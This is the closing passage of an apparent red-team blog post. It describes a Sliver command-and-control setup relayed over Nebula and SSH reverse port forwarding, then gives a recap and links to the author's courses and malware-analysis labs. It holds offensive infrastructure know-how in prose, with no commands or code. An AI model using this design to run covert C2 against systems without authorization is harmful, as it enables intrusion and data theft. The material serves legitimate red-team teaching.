- ⚔️ The reverse port forward on port 8443 is established by SSH on our Teamserver, which uses Lighthouse to identify Listeningpost. Teamserver initiates this because the SSH keys are stored on Teamserver. The public keys have been copied to all hosts in the Nebula network, but the private keys (along with the Nebula cert key) are safe on our Teamserver, which is secured in our ~~gigantic vault with robot guards and turrets~~ ~~apartment~~ on-premise location.
- 🟢 The agent’s traffic is forwarded to the localhost of the Teamserver, where Sliver’s listener has been configured to catch the incoming connection. SSL decryption takes place here, the agent authenticates to the Sliver server, and comms flow securely between the two end points.
It’s safe and sound. Fight’s on!
🍣 The Roll Up (Sushi Roll, Get It? Like A Sushi Roll. Because... Nevermind)
That’s a lot for now, so let’s recap.
We’ve used the design philosophy of Tim MalcomVetter’s Safe Red Team Infrastructure blog post to implement a C2 architecture that keeps our client’s data safe as we pilfer it from the endpoint.
We also used some of byt3bl33d3r’s finesse to make our infrastructure scalable and resilient with the help of Nebula.
We stood up infrastructure that started at our teamserver and worked outward. Each step, we tested and ensured the infra was working as intended. We used cloud provisioned assets responsibly to help out our infrastructure but ensured that no sensitive data would end up on those hosts.
I think that’s all for now because this post is now enormous. But in the next post, I’ll show how to install a proxy that will assess incoming traffic and redirect it to keep blue teamers off our backs.
Until next time!
🌐 Where You Can Find Me
The Taggart Institute: Master Your Craft
Great hackers are good people. Many courses on red teaming will teach you the technical process of how to exploit targets. But seldom do courses cover what it means to carry out the role of a red teamer responsibly.
TryHackMe | Takedown
We have reason to believe a corporate webserver has been compromised by RISOTTO GROUP. Cyber interdiction is authorized for this operation. Find their teamserver and take it down.
Practical Malware Analysis & Triage
Arm yourself with knowledge and bring the fight to the bad guys! Practical Malware Analysis & Triage (PMAT) brings the state of the art of malware analysis to you in engaging instructional videos and custom made, practical labs. Welcome to Practical Malware Analysis & Triage.
GitHub - HuskyHacks/PMAT-labs: Labs for Practical Malware Analysis & Triage
Welcome to the labs for Practical Malware Analysis & Triage. Read this carefully before proceeding. This repository contains live malware samples for use in the Practical Malware Analysis & Triage course (PMAT). These samples are either written to emulate common malware characteristics or are live, real world, "caught in the wild" samples.
Time: 30 mins Difficulty: Beginner Skills: Custom Exploit Development, DLL Hijacking 30 minute exploit dev post. Let's get it. I fell down another security research rabbit hole and when I snapped out of it, I found myself.... ...playing Chrono Trigger? Wait, what? That program in the picture is an SNES Emulator and, if you're like...